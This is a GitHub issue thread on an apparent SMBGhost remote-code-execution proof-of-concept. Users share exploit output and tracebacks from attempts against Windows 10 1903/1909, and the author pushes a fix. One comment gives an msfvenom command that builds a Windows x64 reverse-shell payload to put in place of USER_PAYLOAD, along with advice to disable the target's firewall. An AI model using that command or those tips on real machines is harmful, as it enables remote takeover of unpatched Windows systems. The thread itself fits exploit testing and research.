chompie1337 / SMBGhost_RCE_PoC


Exploit doesn't work

0xFF1E071F opened this issue · comments

I am using py3.8
host machine: Linux
target machine: Win10 b1903

they are on the same virtual network

I got this error when I am trying to run exploit.py

[+] found low stub at phys addr 13000!
[+] PML4 at 1ad000
[+] base of HAL heap at fffff7a180000000
[+] ntoskrnl entry at fffff8054d392010
[+] found PML4 self-ref entry 1e5
[+] found HalpInterruptController at fffff7a1800015b8
Traceback (most recent call last):
  File "exploit.py", line 475, in <module>
    do_rce(args.ip, args.port)
  File "exploit.py", line 438, in do_rce
    search_hal_heap(ip, port)
  File "exploit.py", line 351, in search_hal_heap
    buff = read_physmem_primitive(ip, port, index + i + 0x38)
  File "exploit.py", line 205, in read_physmem_primitive
    buff = try_read_physmem_primitive(ip, port, phys_addr)
  File "exploit.py", line 220, in try_read_physmem_primitive
    buff = sock.recv(1000)
socket.timeout: timed out

edit: fix right error

I have this problem, so what should I do?


Unfortunately I couldn't find a solution yet :/

nvm, it's a bug. I changed the HAL heap search and forgot to update that case. Will post a fix shortly.

Fix for this error has been pushed.

Thank you, I have another error now:

python exploit.py -ip 192.168.100.146
[+] found low stub at phys addr 13000!
[+] PML4 at 1ad000
[+] base of HAL heap at fffff7e380000000
[+] found PML4 self-ref entry 149
[+] found HalpInterruptController at fffff7e3800015b8
Traceback (most recent call last):
  File "exploit.py", line 465, in <module>
    do_rce(args.ip, args.port)
  File "exploit.py", line 428, in do_rce
    search_hal_heap(ip, port)
  File "exploit.py", line 356, in search_hal_heap
    PHALP_APIC_INTERRUPT = struct.unpack("<Q",buff[i + 0x38:i+0x40])[0]
struct.error: unpack requires a buffer of 8 bytes

OK ppl, if you are reading this don't forget to

  1. close the Win 10 b1903/1909 firewall
  2. run msfvenom as:
     msfvenom -a x64 --platform windows -p windows/x64/shell_reverse_tcp LHOST=192.168.113.121 LPORT=31337 -f python
     and replace USER_PAYLOAD with this shellcode.

This code now works on b1903.

And I cannot make it exploit on 1909 machines.

Ok, when I use the exploit on b1909 machines, the Python code works normally (I mean no error output). But the b1909 machine crashes and reboots.

Now works on 1909, thanks.